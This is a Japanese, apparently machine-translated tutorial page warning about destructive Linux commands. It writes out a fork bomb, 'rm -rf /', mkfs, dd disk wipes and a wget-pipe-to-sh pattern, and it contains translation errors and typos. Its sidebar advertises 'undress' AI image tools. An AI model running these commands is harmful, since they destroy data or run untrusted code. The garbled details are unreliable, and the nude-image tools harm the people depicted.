目次
常に注意しなければならない 9 つの PHP コマンドとコード
ホームページ バックエンド開発 PHPチュートリアル 常に注意しなければならない 9 つの PHP コマンドとコード_PHP チュートリアル

常に注意しなければならない 9 つの PHP コマンドとコード_PHP チュートリアル

Jul 13, 2016 am 10:13 AM
プログラマー

常に注意しなければならない 9 つの PHP コマンドとコード

Linux シェル/ターミナル コマンドは非常に強力で、単純なコマンドでもフォルダー、ファイル、またはパス フォルダーが削除される可能性があります。

場合によっては、Linux が要求もせずにコマンドを直接実行し、さまざまなデータ情報が失われることがあります。

一般的に、新しい Linux ユーザーは Web 上でこれらのコマンドを実行することをお勧めします。もちろん、このコードを書いた人の中にはそう考えない人もいます。一度書いてしまえば、これはもはや冗談ではないからです。

ここでは、システムに有害な Linux コードをいくつか集めて、それらを回避できるようにしました。覚えておいてください: このコードは非常に危険であり、さらに有害になるように変更される可能性もあります。

他に注意すべき点: 一部のコマンドは、Ubuntu で sudo プレフィックスが付いている場合にのみ有害です。 Linux の他のディストリビューションは、ルート ディレクトリ コマンドとして使用すると有害になります。

1. Linux フォークボムコマンド

:(){ :|: & };: Fork Bomb として知られる、Linux システムに対するサービス拒否攻撃です。 :(){ :|: & };: は bash 関数です。実行される限り、システムがフリーズするまで繰り返されます。

この問題を解決するには、システムを再起動する必要があります。したがって、Linux インターフェイスでこのコマンドを実行するときは、必ず注意してください。

2. Mv フォルダー/Dev/Null コマンド

mvfolder/dev/null も危険なコマンドです。 Dev/null または null デバイスは、このデバイス ファイルに書き込まれたすべてのデータを削除するデバイス ファイルです。ただし、操作プロンプトでは、書き込み操作が正常に実行されたことが示されます。これは、私たちがよくビット バックまたはブラック ホールと呼ぶものです。

3. Rm -Rf コマンド

rm -rf コマンドは、Linux システムのフォルダーとその内容をすばやく削除できます。正しい使い方を知らないと、ただ泣くだけです。

m-rf コマンドの最も一般的な組み合わせと選択肢を以下に示します:

  • rmコマンド: Linuxシステム内のファイルを削除します
  • rm -f コマンド: プロンプトを表示せずにファイル内の読み取り専用ファイルを削除します
  • rm -r コマンドはフォルダーの内容をループします
  • rm -d コマンド: 空のディレクトリを削除します。ディレクトリが空でない場合、操作は実行されません。
  • rm -rf/ コマンド: ルート ディレクトリ内のすべてのコンテンツとサブフォルダー (書き込み保護されたファイルを含む) コマンドを強制的に削除します。
  • rm -rf* コマンド: 現在のディレクトリ (現在の作業ディレクトリ) とサブフォルダー内のすべてを強制的に削除します
  • rm -rf コマンド: 現在のフォルダー ディレクトリ/サブディレクトリ内のすべての内容を強制的に削除します。 rm -r と同じです。[^.]*
rm -r.[^.]* コマンド: 削除プロンプトを表示してファイルとフォルダーを削除します

4.Mkfsコマンド

mkfs の機能を知らない場合、これは危険なコマンドでもあります。mkfs の後に記述されたコマンドはフォーマットされ、空の Linux ファイル システムに置き換えられます。

ハードドライブをフォーマットするために管理者権限が必要なコマンドは次のとおりです:

    mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos mkfs.reiserfs
  • mkfs.vfat
mkfs.cramfs も上記のコードと同じことを実行できますが、ソースの管理権限は必要ありません。

5. タール爆弾

tar コマンドは、複数のファイルを .tar 形式の 1 つのファイル (アーカイブ ファイル) にまとめるために使用されます。テープ アーカイブ (タール) 爆弾は彼によって作成できます。

圧縮すると、このアーカイブ ファイルによって、新しいディレクトリではなく現在のディレクトリに表示される、同じ名前のファイルが何万も生成されます。

tar ファイルを受信するときは、定期的に新しい保護されたディレクトリを作成し、受信した tar ファイルを解凍する前にこのディレクトリに配置すると、tar 爆弾の被害者になることを避けることができます。

6.DDコマンド

Ddコマンドはハードディスクのパーティションをコピー&変更するために使用されます。間違った場所で使用すると危険です。

dd コマンドは以下にリストされています:

    dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
次のコマンドは、メイン ハード ドライブ全体をゼロにします: dd if=/dev/zero of=/dev/had

7. シェルスクリプトコード

場合によっては、だまされてシェル スクリプト ファイルを渡され、それをダウンロードして実行するよう求められることがあります。スクリプトには悪意のあるコードまたは危険なコードが含まれている可能性があります。コマンド形式は次のようになります: wget http://some_malicious_source -O- | wget は sh ナロースクリプトを実行するときにスクリプトをダウンロードします。

8. 悪意のあるソースコード

もしかしたら誰かがソースコードを渡してコンパイルさせてくれるかもしれません。コードは通常のコードである可能性がありますが、大規模なソース コードの中に悪意のあるコードが隠されている可能性があります。その場合、システムは脆弱です。それを避けるにはどうすればよいでしょうか?信頼できるソースからのソース コードのみが受け入れられ、コンパイルされます。

9. 減圧爆弾

あなたは zip ファイルを受け取り、この一見小さなファイル (おそらく KB ほどのサイズ) を解凍するように求められました。実際、圧縮ファイルの小さいサイズには、高度に圧縮されたデータが含まれています。

ファイルが解凍される限り、数百 GB のデータが抽出されます。この時点で、大きすぎるデータがハードディスクをいっぱいにし、ダウンタイムが発生する可能性が非常に高くなります。それを避けるにはどうすればよいでしょうか?古いことわざにあるように、安っぽくしないで、どんな文書でも受け入れてください。信頼できる情報源からの文書を受け入れてください。

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/915114.html技術記事常に注意しなければならない 9 つの PHP コマンド: Fork Bomb として知られる、Linux システムに対するサービス拒否攻撃です。 :(){ :|: };: は bash 関数です。それが実行される限り、彼は繰り返します...
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

どのAIプログラマーが一番優れているでしょうか? Devin、Tongyi Lingma、SWE エージェントの可能性を探る どのAIプログラマーが一番優れているでしょうか? Devin、Tongyi Lingma、SWE エージェントの可能性を探る Apr 07, 2024 am 09:10 AM

世界初の AI プログラマー Devin の誕生から 1 か月も経たない 2022 年 3 月 3 日、プリンストン大学の NLP チームはオープンソース AI プログラマー SWE-agent を開発しました。 GPT-4 モデルを利用して、GitHub リポジトリの問題を自動的に解決します。 SWE ベンチ テスト セットにおける SWE エージェントのパフォーマンスは Devin と同様で、平均 93 秒かかり、問題の 12.29% を解決しました。専用端末と対話することで、SWE エージェントはファイルの内容を開いて検索したり、自動構文チェックを使用したり、特定の行を編集したり、テストを作成して実行したりできます。 (注: 上記の内容は元の内容を若干調整したものですが、原文の重要な情報は保持されており、指定された文字数制限を超えていません。) SWE-A

C言語の魅力に迫る ~プログラマーの可能性を引き出す~ C言語の魅力に迫る ~プログラマーの可能性を引き出す~ Feb 24, 2024 pm 11:21 PM

C言語学習の魅力:プログラマーの可能性を引き出す テクノロジーの発展に伴い、コンピュータプログラミングは大きな注目を集めている分野です。数あるプログラミング言語の中でもC言語は常にプログラマーに愛されています。そのシンプルさ、効率性、幅広い用途により、C 言語の学習は、多くの人にとってプログラミングの分野に入る最初のステップとなっています。この記事では、C言語を学ぶ魅力と、C言語を学ぶことでプログラマーの可能性を引き出す方法について解説します。 C言語学習の魅力は、まずその簡単さにあります。他のプログラミング言語と比較すると、C言語は

2023过年,又限制放烟花?程序猿有办法! 2023过年,又限制放烟花?程序猿有办法! Jan 20, 2023 pm 02:57 PM

本篇文章给大家介绍如何用前端代码实现一个烟花绽放的绚烂效果,其实主要就是用前端三剑客来实现,也就是HTML+CSS+JS,下面一起来看一下,作者会解说相应的代码,希望对需要的朋友有所帮助。

民間の仕事を引き受けてお金を稼ぎましょう! 2023 年のプログラマー向けの受注プラットフォームの完全なリスト! 民間の仕事を引き受けてお金を稼ぎましょう! 2023 年のプログラマー向けの受注プラットフォームの完全なリスト! Jan 09, 2023 am 09:50 AM

先週、「2023PHP起業家精神」について厚生生放送を行いましたが、多くの学生から具体的な受注プラットフォームについての質問がありましたので、以下のphp中国語サイトに比較的信頼できる22のプラットフォームをまとめましたので参考にしてください。

プログラマーは何をしますか プログラマーは何をしますか Aug 03, 2019 pm 01:40 PM

プログラマーの職務責任: 1. ソフトウェア プロジェクトの詳細な設計、コーディング、組織化と内部テストの実施に責任を負います; 2. プロジェクト マネージャーおよび関連担当者が顧客とコミュニケーションを取り、良好な顧客関係を維持できるように支援します; 3. 需要調査とプロジェクトに参加します実現可能性パフォーマンス分析、技術的実現可能性分析、需要分析 4. ソフトウェア部門が開発したソフトウェア プロジェクトを提供するための関連ソフトウェア テクノロジに精通しており、熟練している 5. ソフトウェア開発の状況についてプロジェクト マネージャーにタイムリーにフィードバックする責任がある 6. . ソフトウェアの開発および保守に参加する プロセス中の主要な技術的問題を解決する; 7. 関連する技術文書などの作成に責任を負います。

520 人のプログラマーが恋愛感情を表現する独自の方法!断ることはできない! 520 人のプログラマーが恋愛感情を表現する独自の方法!断ることはできない! May 19, 2022 pm 03:07 PM

520 年が近づいています。彼は毎年恒例の犬を苦しめるショーのために再びここに来ました。最も合理的なコードと最もロマンチックな告白がどのように衝突するかを知りたいですか?最も完全で完全な広告コードを 1 つずつ見て、プログラマーのロマンスが女神の心を掴めるかどうかを確認してみましょう。

VSCode の過去のバージョンをダウンロードしてインストールする方法の簡単な分析 VSCode の過去のバージョンをダウンロードしてインストールする方法の簡単な分析 Apr 17, 2023 pm 07:18 PM

VSCode の過去のバージョンをダウンロードしてインストールする VSCode のインストール ダウンロード インストール リファレンス VSCode のインストール Windows バージョン: Windows10 VSCode バージョン: VScode1.65.0 (64 ビット ユーザー バージョン) この記事

2022 年の最高の Windows 11 ターミナル エミュレーターのリスト: 推奨事項トップ 15 2022 年の最高の Windows 11 ターミナル エミュレーターのリスト: 推奨事項トップ 15 Apr 24, 2023 pm 04:31 PM

端末エミュレータを使用すると、標準のコンピュータ端末の機能をエミュレートできます。これを使用すると、データ転送を実行したり、別のコンピュータにリモートでアクセスしたりできます。 Windows 11 などの高度なオペレーティング システムと組み合わせると、これらのツールの創造的な可能性は無限大になります。ただし、サードパーティ製の端末エミュレータが多数提供されています。したがって、適切なものを選択するのは困難です。ただし、必須の Windows 11 アプリと同様に、お客様が使用して生産性を向上できる最適なターミナルを選択しました。最適な Windows 11 ターミナル エミュレーターを選択するにはどうすればよいですか?このリストのツールを選択する前に、当社の専門家チームはまず Windows 11 との互換性をテストしました。私たちもチェックしました

See all articles